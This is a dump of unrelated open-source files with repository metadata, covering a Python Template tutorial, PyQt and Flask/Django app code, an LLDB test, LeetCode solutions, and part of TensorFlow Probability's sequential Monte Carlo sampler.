"Orui Academy" (欧瑞学院) is Orui Technology's online IT school, with many up-to-date video courses;
visit http://geekori.com/edu or follow the accounts mentioned above for the mobile version of the academy.
"Geek Question Bank" (极客题库) is Orui Technology's online question bank; scan the mini-program code in the source root directory to install it.
For more information, visit the page below:
https://geekori.com/help/videocourse/readme.html
'''
# Import the Template class from the string module
from string import Template
template1 = Template("$s is my favorite programming language; $s is easy to learn and powerful")
# Set the value of the substitution parameter s to 'Python'
print(template1.substitute(s='Python'))
# When the substitution parameter is only part of a word, wrap the parameter
# name in a pair of braces to separate it from the rest of the string
template2 = Template("${s}stitute")
print(template2.substitute(s='sub'))
template3 = Template("$dollar$$ is equivalent to how many $pounds")
# Substitute two parameters at once
print(template3.substitute(dollar=20,pounds='pounds sterling'))
template4 = Template("$dollar$$ is equivalent to how many $pounds")
data = {}
data['dollar'] = 100
data['pounds'] = 'pounds sterling'
# Use a dictionary to supply the substitution values
print(template4.substitute(data))
| [
"[email protected]"
] | |
4649a07a27a686ce6bfe64cbce1f3e49493be5e0 | 23bfacd796850e9e2766bf3db3dcdfb640aa9cf4 | /anamdesktop/entry.py | 75ca190d87ad46083c09260be33ead5581aeadf0 | [] | no_license | yeleman/anam-desktop | f223e77099c4ca261414e19746ef8237dfcada32 | eefac7f58c84964b7871addffe5cc3201a299ae0 | refs/heads/master | 2021-03-12T17:54:27.987963 | 2020-10-22T18:56:34 | 2020-10-22T18:56:34 | 91,448,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
import sys
from PyQt5 import QtWidgets, QtCore
from anamdesktop import setlocale, logger
from anamdesktop.ui.main import MainWindow
def destroy():
logger.info("Exiting Application")
    QtCore.QCoreApplication.instance().quit()
sys.exit(0)
def main():
logger.info("Starting Application")
app = QtWidgets.QApplication(sys.argv)
app.lastWindowClosed.connect(destroy)
setlocale()
window = MainWindow()
window.reset()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
31f593769f4303c41f20eafa27f63464428e87b0 | 829b0a557d3cc43a108f9b76d748e923fba8d928 | /lldb/packages/Python/lldbsuite/test/functionalities/breakpoint/source_regexp/TestSourceRegexBreakpoints.py | 2258989806066f4b103f6d06ed3b3d0720c6e638 | [
"NCSA",
"LLVM-exception",
"Apache-2.0"
] | permissive | ljh740/llvm-project | 31766f1f687939a679531d372d56755dbb5c415b | 89295aa3f2aebcd930e5ee7272ca47349bb7767d | refs/heads/sbingner/master | 2023-04-06T14:15:22.003403 | 2020-01-07T08:36:49 | 2020-01-07T08:36:49 | 255,562,403 | 0 | 0 | Apache-2.0 | 2021-04-15T14:56:23 | 2020-04-14T09:12:17 | null | UTF-8 | Python | false | false | 3,778 | py | """
Test lldb breakpoint setting by source regular expression.
This test just tests the source file & function restrictions.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestSourceRegexBreakpoints(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test_location(self):
self.build()
self.source_regex_locations()
def test_restrictions(self):
self.build()
self.source_regex_restrictions()
def source_regex_locations(self):
""" Test that restricting source expressions to files & to functions. """
# Create a target by the debugger.
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# First look just in main:
target_files = lldb.SBFileSpecList()
target_files.Append(lldb.SBFileSpec("a.c"))
func_names = lldb.SBStringList()
func_names.AppendString("a_func")
source_regex = "Set . breakpoint here"
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, func_names)
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 1,
"a.c in a_func should give one breakpoint, got %d." %
(num_locations))
loc = main_break.GetLocationAtIndex(0)
self.assertTrue(loc.IsValid(), "Got a valid location.")
address = loc.GetAddress()
self.assertTrue(
address.IsValid(),
"Got a valid address from the location.")
a_func_line = line_number("a.c", "Set A breakpoint here")
line_entry = address.GetLineEntry()
self.assertTrue(line_entry.IsValid(), "Got a valid line entry.")
self.assertTrue(line_entry.line == a_func_line,
"Our line number matches the one lldbtest found.")
def source_regex_restrictions(self):
""" Test that restricting source expressions to files & to functions. """
# Create a target by the debugger.
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# First look just in main:
target_files = lldb.SBFileSpecList()
target_files.Append(lldb.SBFileSpec("main.c"))
source_regex = "Set . breakpoint here"
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, lldb.SBStringList())
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 2,
"main.c should have 2 matches, got %d." %
(num_locations))
# Now look in both files:
target_files.Append(lldb.SBFileSpec("a.c"))
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, lldb.SBStringList())
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 4,
"main.c and a.c should have 4 matches, got %d." %
(num_locations))
# Now restrict it to functions:
func_names = lldb.SBStringList()
func_names.AppendString("main_func")
main_break = target.BreakpointCreateBySourceRegex(
source_regex, lldb.SBFileSpecList(), target_files, func_names)
num_locations = main_break.GetNumLocations()
self.assertTrue(
num_locations == 2,
"main_func in main.c and a.c should have 2 matches, got %d." %
(num_locations))
| [
"[email protected]"
] | |
41e1aa9d1cb1c62fe89cbc3761521eaf73dce401 | 498cc670e199d8d3da497b8350b845c0717c505e | /readit/__init__.py | 6723f5391c8b467acf39e926f77185ca47b08323 | [] | no_license | dave-shawley/readit | 1a0b24fb859f00c6fc415647028ab5ee27453328 | 2a05f1de29ddc18ccae81b866d3da5b0a10d0236 | refs/heads/master | 2020-05-14T14:51:47.951498 | 2013-02-06T01:57:03 | 2013-02-06T01:57:03 | 6,038,460 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | # order is important here
from .helpers import LinkMap
from .reading import Reading
from .user import User
# flaskapp import required to be last since it depends on
# other readit exports
from .flaskapp import app, Application
class MoreThanOneResultError(Exception):
"""You will encounter me when a single instance is expected and more
than one is found or supplied."""
pass
__all__ = ['app', 'Application', 'LinkMap', 'MoreThanOneResultError',
'Reading', 'User']
| [
"[email protected]"
] | |
7aa4bba2c4b8fdf4ef4913eb41b7114c6a87829a | 49dd2e801ae161b97abc2e7704debf1b19ef5f5d | /config.py | 9ad5353015e986a27c9e8308ff1fbbbcc0b6cdba | [] | no_license | Ggzzhh/Learn_Flask | 7b207a45454e71def3bf332c4ee381a03c5f2082 | 3cd52b674e11fcfd883266e504fb11134ae23337 | refs/heads/master | 2021-01-20T09:23:39.089481 | 2017-09-21T01:52:52 | 2017-09-21T01:52:52 | 101,593,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,048 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import os
basedir = os.path.abspath(os.path.dirname(__file__))
# Base configuration
class Config:
    # Secret key
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'GG0914ZH'
    # Automatically commit database changes at the end of each request
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    # Flask-SQLAlchemy will track object modifications and emit signals
    SQLALCHEMY_TRACK_MODIFICATIONS = True
    # Mail subject prefix
    FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky-test]'
    # Mail sender
    FLASKY_MAIL_SENDER = 'Admin <[email protected]>'
    # Number of posts per page
    FLASKY_POSTS_PER_PAGE = 10
    # Number of followers per page
    FLASK_FOLLOWERS_PER_PAGE = 15
    # Number of comments per page
    FLASKY_COMMENTS_PER_PAGE = 15
    # Administrator email address
    FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
    # Threshold in seconds for flagging slow database queries
    FLASKY_SLOW_DB_QUERY_TIME = 0.5
    # Let SQLAlchemy record query statistics
    SQLALCHEMY_RECORD_QUERIES = True
    # SSL switch
    SSL_DISABLE = True
    MAIL_SERVER = 'smtp.139.com' # Mail server address
    MAIL_PORT = 465 # Mail server port
    MAIL_USE_TLS = False # Defaults to False
    MAIL_USE_SSL = True # Use the SSL protocol for mail
    MAIL_USERNAME = os.environ.get('MAIL_USERNAME') # Account taken from the environment
    MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') # Password taken from the environment
@staticmethod
def init_app(app):
pass
# Development configuration
class DevelopmentConfig(Config):
    DEBUG = True # Debug switch
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
# Testing configuration
class TestingConfig(Config):
    TESTING = True # Testing switch
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
@classmethod
def init_app(cls, app):
Config.init_app(app)
        # Email application errors to the administrator
import logging
from logging.handlers import SMTPHandler
credentials = None
secure = None
if getattr(cls, 'MAIL_USERNAME', None) is not None:
credentials = (cls.MAIL_USERNAME, cls.MAIL_PASSWORD)
if getattr(cls, 'MAIL_USE_TLS', None):
secure = ()
mail_handler = SMTPHandler(
mailhost=(cls.MAIL_SERVER, cls.MAIL_PORT),
fromaddr=cls.FLASKY_MAIL_SENDER,
toaddrs=[cls.FLASKY_ADMIN],
subject=cls.FLASKY_MAIL_SUBJECT_PREFIX + ' Application Error',
credentials=credentials,
secure=secure)
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
} | [
"[email protected]"
] | |
aca38c5c4660e95c314a00a95abe93394e298433 | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0037_bit_field.py | 24161f2a4e3a6e98aa27f1d11d43512d52de7cfa | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | import unittest
class Solution:
def solveSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
"""
rows = [-1] * 9
cols = [-1] * 9
blocks = [-1] * 9
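        # Bit fields: each entry starts at -1 (all bits set); bit `num` being set
        # means digit `num` is still available in that row / column / 3x3 block.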
for rownum, row in enumerate(board):
for colnum, num in enumerate(row):
if num != '.':
num = int(num)
mask = ~(1 << num)
rows[rownum] &= mask
cols[colnum] &= mask
blocks[rownum // 3 * 3 + colnum // 3] &= mask
def dfs(rownum, colnum):
while True:
if colnum < 8:
colnum += 1
elif rownum < 8:
colnum = 0
rownum += 1
else:
return True
if board[rownum][colnum] == '.':
break
blocknum = rownum // 3 * 3 + colnum // 3
for num in range(1, 10):
mask = 1 << num
if rows[rownum] & mask and cols[colnum] & mask and blocks[blocknum] & mask:
rows[rownum] &= ~mask
cols[colnum] &= ~mask
blocks[blocknum] &= ~mask
if dfs(rownum, colnum):
board[rownum][colnum] = str(num)
return True
rows[rownum] |= mask
cols[colnum] |= mask
blocks[blocknum] |= mask
return False
dfs(0, -1)
class Test(unittest.TestCase):
def test(self):
self._test([
[5, 3, 0, 0, 7, 0, 0, 0, 0],
[6, 0, 0, 1, 9, 5, 0, 0, 0],
[0, 9, 8, 0, 0, 0, 0, 6, 0],
[8, 0, 0, 0, 6, 0, 0, 0, 3],
[4, 0, 0, 8, 0, 3, 0, 0, 1],
[7, 0, 0, 0, 2, 0, 0, 0, 6],
[0, 6, 0, 0, 0, 0, 2, 8, 0],
[0, 0, 0, 4, 1, 9, 0, 0, 5],
[0, 0, 0, 0, 8, 0, 0, 7, 9],
], [
[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 5, 2, 8, 6, 1, 7, 9],
])
def _test(self, board, expected):
board = [[str(num) if num != 0 else '.' for num in row] for row in board]
Solution().solveSudoku(board)
board = [[int(num) for num in row] for row in board]
self.assertEqual(expected, board)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b095020e31a76e851a1c922f39050300a38635b1 | 942f0b081d2271978ffe20fbbfa8d687b57e5c02 | /leetcode-june-challenge/largest_divisible_subset.py | 78df0caffe4029792b53277570585a87054ba1a7 | [] | no_license | simtb/coding-puzzles | 99762322606bb505d82924d4d5843db1c04aafbd | 9e1d53e35b2117240eb357d7930cdb8cfd891c8e | refs/heads/master | 2021-04-12T15:46:40.181048 | 2021-02-28T23:47:36 | 2021-02-28T23:47:36 | 249,089,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | """
Given a set of distinct positive integers, find the largest subset such that every pair (Si, Sj) of elements in this subset satisfies:
Si % Sj = 0 or Sj % Si = 0.
If there are multiple solutions, returning any one of them is fine.
"""
from typing import List
class Solution:
def largestDivisibleSubset(self, nums) -> List[int]:
if not nums:
return []
nums.sort()
ans: List[List[int]] = [[num] for num in nums]
for i in range(len(nums)):
for j in range(i):
if nums[i] % nums[j] == 0 and len(ans[i]) < len(ans[j]) + 1:
ans[i] = ans[j] + [nums[i]]
return max(ans, key=len)
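# Illustrative calls (hypothetical, not part of the submitted solution):
#   Solution().largestDivisibleSubset([1, 2, 4, 8])  ->  [1, 2, 4, 8]
#   Solution().largestDivisibleSubset([3, 5, 7])     ->  [3] (any singleton is valid)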
| [
"[email protected]"
] | |
8e81d9fa2913d6a02e05fbb400cf98948cbc3c60 | 6e68584f2819351abe628b659c01184f51fec976 | /Centre_College/CSC_117/CSC_117_Python_Files/custom_library.py | b0fe3dea23a2323e7f981eba4de241d6c2dc5a3d | [] | no_license | DanSGraham/code | 0a16a2bfe51cebb62819cd510c7717ae24b12d1b | fc54b6d50360ae12f207385b5d25adf72bfa8121 | refs/heads/master | 2020-03-29T21:09:18.974467 | 2017-06-14T04:04:48 | 2017-06-14T04:04:48 | 36,774,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,531 | py | ###
### A custom library to make CSC 117 labs quicker
###By Daniel Graham
##
from graphics import *
#These save the buttons for use later
button_list = []
points_list = []
button_text_list = []
def button(win_name, button_name, x1,y1,x2,y2,buttontext, button_outline = None, button_fill=None, text_color=None, text_size = 12, text_style = 'normal', default = None):
"""Given 12 inputs window name, button name, points,
text to input, and other options, this function draws a button and saves its points/name to lists for checking
in button_checker. Order of input is:
win_name, button name, position, text, outline, fill, text color, text size, text style"""
#these lines establish the buttons_list and points_list as global variables
global button_list
global points_list
global button_text_list
#If the points are not given in the correct order this code rearranges them.
if x1 > x2:
x1,x2 = x2,x1
if y1 > y2:
y1, y2 = y2, y1
#This code draws the button
button_name = Rectangle(Point(x1, y1), Point(x2, y2))
button_text = Text(Point((x1 + (x2-x1)/2), (y1+ (y2-y1)/2)), str(buttontext))
button_name.draw(win_name)
button_text.draw(win_name)
#The next parts allow for colors!!!
if button_outline != default or button_outline != '':
button_name.setOutline(button_outline)
if button_fill != default or button_fill != '':
button_name.setFill(button_fill)
if text_color != default or text_color != '':
button_text.setTextColor(text_color)
if text_size != default or text_size != '':
button_text.setSize(text_size)
if text_style != default or text_style != '':
button_text.setStyle(text_style)
#These lines store the button name and points for use later in the checker
button_list.append(button_name)
button_text_list.append(button_text)
points_list.append(x1)
points_list.append(y1)
points_list.append(x2)
points_list.append(y2)
return button_name
def button_check(win_name):
"""This function takes button points and a window name and checks which button was clicked. Must have the lists named button_list and points_list"""
#establishes global variables
global button_list
global points_list
while True:
clicked_point = win_name.getMouse()
clicked_x = clicked_point.getX()
clicked_y = clicked_point.getY()
for i in range(len(button_list)):
if clicked_x > points_list[i*4] and clicked_x < points_list[(2)+(4*i)] and clicked_y > points_list[1+4*i] and clicked_y < points_list[3 + 4*i]:
return button_list[i]
def button_undraw(to_undraw):
"""This function undraws a list of buttons or single button from the window"""
global button_text_list
global button_list
if type(to_undraw) == list :
for button in to_undraw:
button.undraw()
index_of_text_undraw = to_undraw.index(button)
button_text_list[index_of_text_undraw].undraw()
elif type(to_undraw) != list :
button = to_undraw
button.undraw()
index_of_text_undraw = button_list.index(button)
button_text_list[index_of_text_undraw].undraw()
button_list.remove(button)
button_text_list.remove(button_text_list[index_of_text_undraw])
def test():
window = GraphWin('Test Window')
close_button = 0 #initialize the button variable
close_button = button(window, close_button, 1,1,150,150, "close")#Set each button variable equal to the button it refers to
no_close_button = 0
no_close_button = button(window, no_close_button, 160,160,180,180, "No close")
if button_check(window) == close_button: #check which button variable is called
print "Close!"
elif button_check(window) == no_close_button:
print "No close"
#close_button.undraw() The issue with this approach is the text does not get undrawn.
button_undraw(close_button)#undraw desired buttons
window.getMouse()
button_undraw(button_list)
window.getMouse
window.close()
#Running into errors still
#For some reason the remaining list is not undrawing and the no close button has to be clicked twice to return its value
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
6c84cb245a34a99d80a0b5e9643a2cc14e435e3e | f4fa497cbd99e24e242a133e002c8142051a6902 | /words/urls.py | 796ee61ba06c25dd5414fda69636f201e9dbaf5d | [] | no_license | austinbrovick/django-economics | 3b8e79a21e2a17a52e57b2a0731f4e797ee1b8c2 | 9ce51bd7e134e84409c48ae541e01456d48af2cb | refs/heads/master | 2021-01-17T12:37:47.587407 | 2016-06-20T03:44:05 | 2016-06-20T03:44:05 | 58,336,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from django.conf.urls import url
from .views import word_list, WordCreate, word_detail, DefinitionCreate, DefinitionDownVote, DefinitionUpVote, words_micro, words_macro, words_both
urlpatterns = [
url(r'^$', word_list, name='words_list'),
url(r'^create/$', WordCreate.as_view(), name='words_word_create'),
url(r'^(?P<pk>\d+)/$', word_detail, name='words_word_detail'),
url(r'^create/(?P<pk>\d+)/$', DefinitionCreate.as_view(), name='words_definition_create'),
url(r'^upvote/(?P<pk>\d+)/$', DefinitionUpVote.as_view(), name='words_definition_upvote'),
url(r'^downvote/(?P<pk>\d+)/$', DefinitionDownVote.as_view(), name='words_definition_downvote'),
url(r'^microeconomics/$', words_micro, name='words_micro'),
url(r'^macroeconomics/$', words_macro, name='words_macro'),
url(r'^micro_and_macro/$', words_both, name='words_both'),
]
| [
"[email protected]"
] | |
924d29ab36ead397539c2dbdea111bceb73f20aa | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/edbcf1a652c246b7a144d8311374fbc3.py | e715104cfa6369084ca1fb912c106baa188e1191 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 240 | py | def hey(message):
message = message.strip()
if not message:
return 'Fine. Be that way!'
if message.isupper():
return 'Woah, chill out!'
if message.endswith('?'):
return 'Sure.'
return 'Whatever.'
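# Illustrative calls (hypothetical, mirroring the exercise description):
#   hey("WATCH OUT!")  -> 'Woah, chill out!'
#   hey("Does this cryogenic chamber make me look fat?")  -> 'Sure.'
#   hey("   ")  -> 'Fine. Be that way!'
#   hey("Tom-ay-to, tom-aaaah-to.")  -> 'Whatever.'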
| [
"[email protected]"
] | |
cb69a7b7282f4fb2539a466dee032cf0532748eb | 78d5a6e0846cb6b03544e4f717651ca59dfc620c | /treasury-admin/interface/migrations/0005_auto_20171026_1641.py | 47e6661136111d9a0fd9cdbb9048864ba031a0c8 | [] | no_license | bsca-bank/treasury-admin | 8952788a9a6e25a1c59aae0a35bbee357d94e685 | 5167d6c4517028856701066dd5ed6ac9534a9151 | refs/heads/master | 2023-02-05T12:45:52.945279 | 2020-12-13T08:07:41 | 2020-12-13T08:07:41 | 320,323,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-26 15:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('interface', '0004_auto_20171026_0918'),
]
operations = [
migrations.RemoveField(
model_name='apbkcom',
name='date_cr',
),
migrations.RemoveField(
model_name='apbkcom',
name='date_dr',
),
]
| [
"[email protected]"
] | |
2abc469fd8fa1c35134df85ffb8634a4f1989de0 | 3be42b83a15d022f5863c96ec26e21bac0f7c27e | /tensorflow_probability/python/experimental/mcmc/sample_sequential_monte_carlo.py | abda0f56e671f79f146e53b03248b99b99d40d8e | [
"Apache-2.0"
] | permissive | ogrisel/probability | 846f5c13cddee5cf167b215e651b7479003f15d2 | 8f67456798615f9bf60ced2ce6db5d3dba3515fe | refs/heads/master | 2022-11-09T10:53:23.000918 | 2020-07-01T23:16:03 | 2020-07-01T23:17:25 | 276,580,359 | 2 | 1 | Apache-2.0 | 2020-07-02T07:37:58 | 2020-07-02T07:37:57 | null | UTF-8 | Python | false | false | 24,262 | py | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Experimental MCMC driver, `sample_sequential_monte_carlo`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.experimental.mcmc import weighted_resampling
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.math.generic import log1mexp
from tensorflow_probability.python.math.generic import log_add_exp
from tensorflow_probability.python.math.generic import reduce_logmeanexp
from tensorflow_probability.python.mcmc import hmc
from tensorflow_probability.python.mcmc import random_walk_metropolis
from tensorflow_probability.python.mcmc import transformed_kernel
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
from tensorflow_probability.python.util.seed_stream import SeedStream
__all__ = [
'default_make_hmc_kernel_fn',
'gen_make_hmc_kernel_fn',
'gen_make_transform_hmc_kernel_fn',
'make_rwmh_kernel_fn',
'sample_sequential_monte_carlo',
'simple_heuristic_tuning',
]
PRINT_DEBUG = False
ParticleInfo = collections.namedtuple(
'ParticleInfo',
[
'log_accept_prob', # log acceptance probability per particle
'log_scalings',
'tempered_log_prob',
'likelihood_log_prob',
])
SMCResults = collections.namedtuple(
'SMCResults',
[
'num_steps',
'inverse_temperature',
'log_marginal_likelihood',
'particle_info', # A namedtuple of ParticleInfo
])
def gather_mh_like_result(results):
"""Gather log_accept_ratio and target_log_prob from kernel result."""
# For MH kernel result.
if (hasattr(results, 'proposed_results')
and hasattr(results, 'accepted_results')):
return results.log_accept_ratio, results.accepted_results.target_log_prob
# For NUTS kernel result.
if (hasattr(results, 'log_accept_ratio')
and hasattr(results, 'target_log_prob')):
return results.log_accept_ratio, results.target_log_prob
# For TransformTransitionKernel Result.
if hasattr(results, 'inner_results'):
return gather_mh_like_result(results.inner_results)
raise TypeError('Cannot find MH results.')
def default_make_tempered_target_log_prob_fn(
prior_log_prob_fn, likelihood_log_prob_fn, inverse_temperatures):
"""Helper which creates inner kernel target_log_prob_fn."""
def _tempered_target_log_prob(*args):
priorlogprob = tf.identity(prior_log_prob_fn(*args),
name='prior_log_prob')
loglike = tf.identity(likelihood_log_prob_fn(*args),
name='likelihood_log_prob')
return tf.identity(priorlogprob + loglike * inverse_temperatures,
name='tempered_logp')
return _tempered_target_log_prob
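# The tempered target interpolates between the prior (inverse_temperatures == 0)
# and the full posterior (inverse_temperatures == 1): log_prior(x) + beta * log_lik(x).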
def make_rwmh_kernel_fn(target_log_prob_fn, init_state, scalings, seed=None):
"""Generate a Random Walk MH kernel."""
with tf.name_scope('make_rwmh_kernel_fn'):
seed = SeedStream(seed, salt='make_rwmh_kernel_fn')
state_std = [
tf.math.reduce_std(x, axis=0, keepdims=True)
for x in init_state
]
step_size = [
s * ps.cast( # pylint: disable=g-complex-comprehension
mcmc_util.left_justified_expand_dims_like(scalings, s),
s.dtype) for s in state_std
]
return random_walk_metropolis.RandomWalkMetropolis(
target_log_prob_fn,
new_state_fn=random_walk_metropolis.random_walk_normal_fn(
scale=step_size),
seed=seed)
def compute_hmc_step_size(scalings, state_std, num_leapfrog_steps):
return [
s / ps.cast(num_leapfrog_steps, s.dtype) * ps.cast( # pylint: disable=g-complex-comprehension
mcmc_util.left_justified_expand_dims_like(scalings, s),
s.dtype) for s in state_std
]
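# Per-dimension step size is scaling * std(state) / num_leapfrog_steps, so one
# full leapfrog trajectory moves on the order of scaling * std(state).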
def gen_make_transform_hmc_kernel_fn(unconstraining_bijectors,
num_leapfrog_steps=10):
"""Generate a transformed hmc kernel."""
def make_transform_hmc_kernel_fn(
target_log_prob_fn,
init_state,
scalings,
seed=None):
"""Generate a transform hmc kernel."""
with tf.name_scope('make_transformed_hmc_kernel_fn'):
seed = SeedStream(seed, salt='make_transformed_hmc_kernel_fn')
# TransformedTransitionKernel doesn't modify the input step size, thus we
# need to pass the appropriate step size that are already in unconstrained
# space
state_std = [
tf.math.reduce_std(bij.inverse(x), axis=0, keepdims=True)
for x, bij in zip(init_state, unconstraining_bijectors)
]
step_size = compute_hmc_step_size(scalings, state_std, num_leapfrog_steps)
return transformed_kernel.TransformedTransitionKernel(
hmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn,
num_leapfrog_steps=num_leapfrog_steps,
step_size=step_size,
seed=seed),
unconstraining_bijectors)
return make_transform_hmc_kernel_fn
def gen_make_hmc_kernel_fn(num_leapfrog_steps=10):
"""Generate a transformed hmc kernel."""
def make_hmc_kernel_fn(
target_log_prob_fn,
init_state,
scalings,
seed=None):
"""Generate a hmc without transformation kernel."""
with tf.name_scope('make_hmc_kernel_fn'):
seed = SeedStream(seed, salt='make_hmc_kernel_fn')
state_std = [
tf.math.reduce_std(x, axis=0, keepdims=True)
for x in init_state
]
step_size = compute_hmc_step_size(scalings, state_std, num_leapfrog_steps)
return hmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn,
num_leapfrog_steps=num_leapfrog_steps,
step_size=step_size,
seed=seed)
return make_hmc_kernel_fn
# Generate a default `make_hmc_kernel_fn`
default_make_hmc_kernel_fn = gen_make_hmc_kernel_fn()
def simple_heuristic_tuning(num_steps,
log_scalings,
log_accept_prob,
optimal_accept=0.234,
target_accept_prob=0.99,
name=None):
"""Tune the number of steps and scaling of one mutation.
# TODO(b/152412213): Better explanation of the heuristic used here.
This is a simple heuristic for tuning the number of steps of the next
mutation, as well as the scaling of a transition kernel (e.g., step size in
HMC, scale of a Normal proposal in RWMH) using the acceptance probability from
the previous mutation stage in SMC.
Args:
    num_steps: The initial number of steps for the next mutation, to be tuned.
log_scalings: The log of the scale of the proposal kernel
log_accept_prob: The log of the acceptance ratio from the last mutation.
    optimal_accept: Optimal acceptance ratio for the transition kernel. Default
      value is 0.234 (optimal for a Random Walk Metropolis kernel).
target_accept_prob: Target acceptance probability at the end of one mutation
step. Default value: 0.99
name: Python `str` name prefixed to Ops created by this function.
Default value: `None`.
Returns:
num_steps: The number of steps for the next mutation.
new_log_scalings: The log of the scale of the proposal kernel for the next
mutation.
"""
with tf.name_scope(name or 'simple_heuristic_tuning'):
optimal_accept = tf.constant(optimal_accept, dtype=log_accept_prob.dtype)
target_accept_prob = tf.constant(
target_accept_prob, dtype=log_accept_prob.dtype)
log_half_constant = tf.constant(np.log(.5), dtype=log_scalings.dtype)
avg_log_scalings = reduce_logmeanexp(log_scalings, axis=0)
avg_log_accept_prob = reduce_logmeanexp(
log_accept_prob, axis=0)
avg_log_scaling_target = avg_log_scalings + (
tf.exp(avg_log_accept_prob) - optimal_accept)
new_log_scalings = log_half_constant + log_add_exp(
avg_log_scaling_target,
log_scalings + (tf.exp(log_accept_prob) - optimal_accept)
)
num_particles = ps.shape(log_accept_prob)[-1]
num_proposed = tf.cast(
num_particles * num_steps, dtype=avg_log_accept_prob.dtype)
# max(1/num_proposed, average_accept_ratio)
log_avg_accept = tf.math.maximum(-tf.math.log(num_proposed),
avg_log_accept_prob)
num_steps = tf.cast(
tf.math.log1p(-target_accept_prob) / log1mexp(log_avg_accept),
dtype=num_steps.dtype)
# We choose the number of steps from the batch that takes the longest,
# hence this is a reduce over all axes.
max_step_across_batch = tf.reduce_max(num_steps)
return max_step_across_batch, new_log_scalings
# TODO(b/152412213) Experiment to improve recommendation on static parameters
def sample_sequential_monte_carlo(
prior_log_prob_fn,
likelihood_log_prob_fn,
current_state,
min_num_steps=2,
max_num_steps=25,
max_stage=100,
make_kernel_fn=make_rwmh_kernel_fn,
tuning_fn=simple_heuristic_tuning,
make_tempered_target_log_prob_fn=default_make_tempered_target_log_prob_fn,
resample_fn=weighted_resampling.resample_systematic,
